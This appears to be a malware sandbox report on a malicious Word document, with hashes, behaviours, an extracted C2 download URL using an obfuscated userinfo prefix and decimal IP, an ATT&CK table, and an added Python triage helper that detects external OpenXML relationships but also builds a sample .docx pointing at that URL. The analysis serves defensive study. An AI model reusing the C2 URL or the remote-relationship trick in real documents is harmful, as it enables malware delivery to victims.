General

  • Target

    UPDATED ORDER.docx.zip

  • Size

    7KB

  • Sample

    230216-sq122shg8v

  • MD5

    ed282229775b9e6f07d7663c353684eb

  • SHA1

    f3877603cd65b288d89ea3b848a175e1a31f73bf

  • SHA256

    e2d05d32d5072991f4ecf2e808e70648d98cf019fb49eca37634c510c5736b03

  • SHA512

    646b04afe928ae0434fe0bf90fd531d5277e91afb7c5803fae2b2dfbb9dc9308fa9970c290ac11bd68e8da214b8e16fa1c068c6f47f87bed5944233903daa202

  • SSDEEP

    192:aJeHLmAR4Nh1/8PT3rslmxeBxPME12BUZiYd9VY:CeH54Nh1cslmaPME4BciM9VY

Score
10/10

Malware Config

Extracted

Rule
Microsoft Office WebSettings Relationship
C2

http:/QQQQWWWWQWWWWQWWQWQWQWQQWQWQQWQWQWQWQWQWQWQQQQQQQQOQQQQQOOOOOOOOQOQQQQOQOQOQOQOQOQQWWWWQWQWQWQWQWQWQWQWQQWQ@3118348624/O_O.DOC

Targets

    • Target

      UPDATED ORDER.docx

    • Size

      10KB

    • MD5

      045c9a932ad454a9c226e146d761b284

    • SHA1

      eba9136f2eb1eef380b1dcdd3745f3ddb3631613

    • SHA256

      59087ec2fbf8340268cd3aeeed9e4f3bd107cd2c1852a074f38e3723dfa7cf00

    • SHA512

      19fc83fcdee224b4e64a5b333ce732a1bdbc8c086ac2d41a26e00c77dbf6bc22c34637936d8acf1cac4bc0a67ac3012713f432ce147a6137b13382a57579380b

    • SSDEEP

      192:ScIMmtP5hG/b7XN+eO4DAO+5+5F7Jar/YEChI3nPV:SPXRE7XtO4DA7wtar/YECOnN

    Score
    8/10

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Abuses OpenXML format to download file from external location

    • Executes dropped EXE

    • Loads dropped DLL

    • Uses the VBS compiler for execution
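The two extracted indicators above are worth decoding by hand. The "Microsoft Office WebSettings Relationship" rule fires on a relationship in the package's webSettings.xml.rels whose TargetMode is External, which is how the inner document pulls a file from outside the package ("Abuses OpenXML format to download file from external location"). The C2 value hides its host behind a long userinfo prefix: everything before the last "@" in the authority is ignored for the connection, the scheme is followed by a single slash that Office and browsers still accept, and the host 3118348624 is a 32-bit decimal IPv4 address, which works out to 185.222.57.80 (computed from the value on this page). The helper below is an added example, not tooling from the sandbox vendor: it walks every *.rels part of a .docx, lists external relationships, and normalises such URLs. The minimal package it builds is constructed for the demonstration, and the relationship Type it uses (".../relationships/frame") is an assumption, since the report does not show the real part's contents.

```python
"""Triage helper for OpenXML remote-template / frame abuse.

Added example (not sandbox code): lists every relationship in a .docx whose
TargetMode is External and decodes obfuscated download URLs of the form
scheme:/<userinfo>@<decimal IPv4>/<path>.
"""
import io
import ipaddress
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# C2 value copied verbatim from the report above.
C2_URL = "http:/QQQQWWWWQWWWWQWWQWQWQWQQWQWQQWQWQWQWQWQWQWQQQQQQQQOQQQQQOOOOOOOOQOQQQQOQOQOQOQOQOQQWWWWQWQWQWQWQWQWQWQWQQWQ@3118348624/O_O.DOC"


def external_relationships(docx_bytes: bytes) -> list[tuple[str, str, str]]:
    """Return (part name, relationship Type, Target) for every relationship
    with TargetMode="External", scanning all *.rels parts, not only
    document.xml.rels, so webSettings/settings/header parts are covered."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    found.append((name, rel.get("Type", ""), rel.get("Target", "")))
    return found


def decode_url_host(url: str) -> tuple[str, str, str]:
    """Split a possibly malformed URL into (userinfo, host, path).

    Accepts 'scheme:/authority' as well as 'scheme://authority'; treats
    everything before the last '@' of the authority as userinfo; converts
    an all-digit host (32-bit decimal IPv4) to dotted-quad form."""
    m = re.match(r"(?i)^[a-z][a-z0-9+.-]*:/*([^/?#]*)(.*)$", url)
    if not m:
        raise ValueError("not a URL with a scheme")
    authority, path = m.group(1), m.group(2)
    userinfo, _, hostport = authority.rpartition("@")
    host = hostport.rsplit(":", 1)[0] if ":" in hostport else hostport
    if host.isdigit():
        host = str(ipaddress.IPv4Address(int(host)))
    return userinfo, host, path


def build_sample_docx() -> bytes:
    """Constructed minimal package (not the real sample) whose webSettings
    relationship points at an external target. The Type attribute is an
    assumption; the internal document.xml.rels entry is there to show that
    ordinary relationships are not reported."""
    ext_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/frame" '
        f'Target="{C2_URL}" TargetMode="External"/>'
        "</Relationships>"
    )
    int_rels = (
        f'<Relationships xmlns="{RELS_NS}">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<Types xmlns="http://schemas.'
                    'openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/webSettings.xml", '<w:webSettings xmlns:w="http://'
                    'schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/webSettings.xml.rels", ext_rels)
        zf.writestr("word/_rels/document.xml.rels", int_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, rtype, target in external_relationships(build_sample_docx()):
        user, host, path = decode_url_host(target)
        print(f"{part}: {rtype.rsplit('/', 1)[-1]} -> {host}{path} "
              f"(userinfo of {len(user)} chars dropped)")
```

Run it against a suspect document with `external_relationships(open(path, "rb").read())`; any hit in webSettings.xml.rels or settings.xml.rels is a strong signal on its own, and the decoded host is what to block and pivot on, since the raw URL string will not match feed entries written in dotted-quad form.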

MITRE ATT&CK Matrix (ATT&CK v6)

Tactic          | Technique                         | ID    | Count
----------------|-----------------------------------|-------|------
Execution       | Scripting                         | T1064 | 1
Execution       | Exploitation for Client Execution | T1203 | 1
Defense Evasion | Scripting                         | T1064 | 1
Defense Evasion | Modify Registry                   | T1112 | 1
Discovery       | Query Registry                    | T1012 | 2
Discovery       | System Information Discovery      | T1082 | 2
